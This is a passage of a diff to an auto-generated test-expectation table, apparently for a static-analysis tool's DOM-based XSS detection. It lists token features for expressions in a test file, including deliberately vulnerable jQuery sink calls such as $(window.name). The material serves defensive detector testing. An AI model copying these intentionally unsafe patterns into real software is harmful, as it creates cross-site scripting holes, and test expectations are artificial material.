element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:258:1:258:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:258:1:258:0 | this | enclosingFunctionBody | $ window name $ name | +| autogenerated/Xss/DomBasedXss/tst.js:258:1:258:0 | this | enclosingFunctionName | windowName | +| autogenerated/Xss/DomBasedXss/tst.js:258:1:258:0 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:258:1:261:1 | 'arguments' object of function windowName | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:258:1:261:1 | 'arguments' object of function windowName | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:258:1:261:1 | 'arguments' object of function windowName | enclosingFunctionBody | $ window name $ name | +| autogenerated/Xss/DomBasedXss/tst.js:258:1:261:1 | 'arguments' object of function windowName | enclosingFunctionName | windowName | +| autogenerated/Xss/DomBasedXss/tst.js:258:1:261:1 | 'arguments' object of function windowName | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:258:1:261:1 | exceptional return of function windowName | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:258:1:261:1 | exceptional return of function windowName | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:258:1:261:1 | exceptional return of function windowName | enclosingFunctionBody | $ window name $ name | +| autogenerated/Xss/DomBasedXss/tst.js:258:1:261:1 | exceptional return of function windowName | enclosingFunctionName | windowName | +| autogenerated/Xss/DomBasedXss/tst.js:258:1:261:1 | exceptional return of function windowName | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:258:1:261:1 | functio ... OT OK\\n} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:258:1:261:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:258:1:261:1 | functio ... OT OK\\n} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:258:1:261:1 | return of function windowName | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:258:1:261:1 | return of function windowName | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:258:1:261:1 | return of function windowName | enclosingFunctionBody | $ window name $ name | +| autogenerated/Xss/DomBasedXss/tst.js:258:1:261:1 | return of function windowName | enclosingFunctionName | windowName | +| autogenerated/Xss/DomBasedXss/tst.js:258:1:261:1 | return of function windowName | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:258:10:258:19 | windowName | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:258:10:258:19 | windowName | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:258:10:258:19 | windowName | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:259:5:259:5 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:259:5:259:5 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:259:5:259:5 | $ | enclosingFunctionBody | $ window name $ name | +| autogenerated/Xss/DomBasedXss/tst.js:259:5:259:5 | $ | enclosingFunctionName | windowName | +| autogenerated/Xss/DomBasedXss/tst.js:259:5:259:5 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:259:5:259:18 | $(window.name) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:259:5:259:18 | $(window.name) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:259:5:259:18 | $(window.name) | enclosingFunctionBody | $ window name $ name | +| autogenerated/Xss/DomBasedXss/tst.js:259:5:259:18 | $(window.name) | enclosingFunctionName | windowName | +| autogenerated/Xss/DomBasedXss/tst.js:259:5:259:18 | $(window.name) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:259:5:259:18 | exceptional return of $(window.name) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:259:5:259:18 | exceptional return of $(window.name) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:259:5:259:18 | exceptional return of $(window.name) | enclosingFunctionBody | $ window name $ name | +| autogenerated/Xss/DomBasedXss/tst.js:259:5:259:18 | exceptional return of $(window.name) | enclosingFunctionName | windowName | +| autogenerated/Xss/DomBasedXss/tst.js:259:5:259:18 | exceptional return of $(window.name) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:259:7:259:12 | window | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:259:7:259:12 | window | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:259:7:259:12 | window | enclosingFunctionBody | $ window name $ name | +| autogenerated/Xss/DomBasedXss/tst.js:259:7:259:12 | window | enclosingFunctionName | windowName | +| autogenerated/Xss/DomBasedXss/tst.js:259:7:259:12 | window | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:259:7:259:17 | window.name | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:259:7:259:17 | window.name | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:259:7:259:17 | window.name | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17069,6 +118503,26 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:259:7:259:17 | window.name | enclosingFunctionBody | $ window name $ name | | autogenerated/Xss/DomBasedXss/tst.js:259:7:259:17 | window.name | enclosingFunctionName | windowName | | autogenerated/Xss/DomBasedXss/tst.js:259:7:259:17 | window.name | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:259:14:259:17 | name | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:259:14:259:17 | name | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:259:14:259:17 | name | enclosingFunctionBody | $ window name $ name | +| autogenerated/Xss/DomBasedXss/tst.js:259:14:259:17 | name | enclosingFunctionName | windowName | +| autogenerated/Xss/DomBasedXss/tst.js:259:14:259:17 | name | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:260:5:260:5 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:260:5:260:5 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:260:5:260:5 | $ | enclosingFunctionBody | $ window name $ name | +| autogenerated/Xss/DomBasedXss/tst.js:260:5:260:5 | $ | enclosingFunctionName | windowName | +| autogenerated/Xss/DomBasedXss/tst.js:260:5:260:5 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:260:5:260:11 | $(name) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:260:5:260:11 | $(name) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:260:5:260:11 | $(name) | enclosingFunctionBody | $ window name $ name | +| autogenerated/Xss/DomBasedXss/tst.js:260:5:260:11 | $(name) | enclosingFunctionName | windowName | +| autogenerated/Xss/DomBasedXss/tst.js:260:5:260:11 | $(name) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:260:5:260:11 | exceptional return of $(name) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:260:5:260:11 | exceptional return of $(name) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:260:5:260:11 | exceptional return of $(name) | enclosingFunctionBody | $ window name $ name | +| autogenerated/Xss/DomBasedXss/tst.js:260:5:260:11 | exceptional return of $(name) | enclosingFunctionName | windowName | +| autogenerated/Xss/DomBasedXss/tst.js:260:5:260:11 | exceptional return of $(name) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:260:7:260:10 | name | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:260:7:260:10 | name | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:260:7:260:10 | name | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17076,6 +118530,82 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:260:7:260:10 | name | enclosingFunctionBody | $ window name $ name | | autogenerated/Xss/DomBasedXss/tst.js:260:7:260:10 | name | enclosingFunctionName | windowName | | autogenerated/Xss/DomBasedXss/tst.js:260:7:260:10 | name | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:262:1:262:0 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:262:1:262:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:262:1:262:0 | this | enclosingFunctionBody | name a b $ window name $ name | +| autogenerated/Xss/DomBasedXss/tst.js:262:1:262:0 | this | enclosingFunctionName | windowNameAssigned | +| autogenerated/Xss/DomBasedXss/tst.js:262:1:262:0 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:262:1:267:1 | 'arguments' object of function windowNameAssigned | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:262:1:267:1 | 'arguments' object of function windowNameAssigned | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:262:1:267:1 | 'arguments' object of function windowNameAssigned | enclosingFunctionBody | name a b $ window name $ name | +| autogenerated/Xss/DomBasedXss/tst.js:262:1:267:1 | 'arguments' object of function windowNameAssigned | enclosingFunctionName | windowNameAssigned | +| autogenerated/Xss/DomBasedXss/tst.js:262:1:267:1 | 'arguments' object of function windowNameAssigned | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:262:1:267:1 | exceptional return of function windowNameAssigned | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:262:1:267:1 | exceptional return of function windowNameAssigned | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:262:1:267:1 | exceptional return of function windowNameAssigned | enclosingFunctionBody | name a b $ window name $ name | +| autogenerated/Xss/DomBasedXss/tst.js:262:1:267:1 | exceptional return of function windowNameAssigned | enclosingFunctionName | windowNameAssigned | +| autogenerated/Xss/DomBasedXss/tst.js:262:1:267:1 | exceptional return of function windowNameAssigned | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:262:1:267:1 | functio ... }\\n} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:262:1:267:1 | functio ... }\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:262:1:267:1 | functio ... }\\n} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:262:1:267:1 | return of function windowNameAssigned | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:262:1:267:1 | return of function windowNameAssigned | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:262:1:267:1 | return of function windowNameAssigned | enclosingFunctionBody | name a b $ window name $ name | +| autogenerated/Xss/DomBasedXss/tst.js:262:1:267:1 | return of function windowNameAssigned | enclosingFunctionName | windowNameAssigned | +| autogenerated/Xss/DomBasedXss/tst.js:262:1:267:1 | return of function windowNameAssigned | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:262:10:262:27 | windowNameAssigned | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:262:10:262:27 | windowNameAssigned | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:262:10:262:27 | windowNameAssigned | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:263:10:263:13 | name | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:263:10:263:13 | name | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:263:10:263:13 | name | enclosingFunctionBody | name a b $ window name $ name | +| autogenerated/Xss/DomBasedXss/tst.js:263:10:263:13 | name | enclosingFunctionName | windowNameAssigned | +| autogenerated/Xss/DomBasedXss/tst.js:263:10:263:13 | name | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:263:18:263:27 | ['a', 'b'] | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:263:18:263:27 | ['a', 'b'] | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:263:18:263:27 | ['a', 'b'] | enclosingFunctionBody | name a b $ window name $ name | +| autogenerated/Xss/DomBasedXss/tst.js:263:18:263:27 | ['a', 'b'] | enclosingFunctionName | windowNameAssigned | +| autogenerated/Xss/DomBasedXss/tst.js:263:18:263:27 | ['a', 'b'] | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:263:19:263:21 | 'a' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, 